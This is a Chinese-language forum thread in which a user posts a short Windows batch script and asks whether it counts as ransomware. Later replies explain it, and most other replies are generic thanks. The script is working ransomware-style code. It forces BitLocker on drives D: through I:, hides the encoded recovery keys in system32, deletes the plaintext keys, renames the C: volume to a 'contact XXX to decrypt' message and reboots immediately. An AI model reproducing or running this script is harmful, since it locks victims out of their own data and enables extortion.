精易论坛

标题: BAT代码鉴赏 [打印本页]

作者: yppy988 时间: 2024-8-3 14:15
标题: BAT代码鉴赏
manage-bde -on D: -rp>>c:\windows\system32\user.txt
manage-bde -on E: -rp>>c:\windows\system32\user.txt
manage-bde -on F: -rp>>c:\windows\system32\user.txt
manage-bde -on G: -rp>>c:\windows\system32\user.txt
manage-bde -on H: -rp>>c:\windows\system32\user.txt
manage-bde -on I: -rp>>c:\windows\system32\user.txt
label C: 解密数据联系XXX
certutil -encode c:\windows\system32\user.txt c:\windows

\system32\000.000
del /f /q c:\windows\system32\user.txt
shutdown /r /t 0

这算不算勒索病毒代码

作者: airaz 时间: 2024-8-4 09:18
https://developer.aliyun.com/article/1468015

作者: 一指温柔 时间: 2024-8-4 10:33
支持开源~！感谢分享

作者: 285275928 时间: 2024-8-4 15:44
支持开源~！感谢分享

作者: 艾玛克138 时间: 2024-8-4 21:10
感谢楼主无私奉献

作者: jtucar 时间: 2024-8-5 09:07
支持开源~！感谢分享

作者: 396384183 时间: 2024-8-5 09:35

宝贵经验啊，很值得学习

作者: 算法艺术家 时间: 2024-8-5 10:31
完全看不懂建议每行加上注释

作者: yppy988 时间: 2024-8-5 12:35

sunhechao 发表于 2024-8-5 10:31
完全看不懂建议每行加上注释

就是把除C盘以外的分区强制开启BL锁并把秘钥加密保存在C盘的自定义位置，然后把C盘卷名改成解密联系XXX
然后在重启

作者: 1253363143 时间: 2024-8-13 11:02
66666666666666

作者: 熊不熊 时间: 2024-12-4 21:10
感谢分享，很给力！~

欢迎光临精易论坛 (https://125.confly.eu.org/)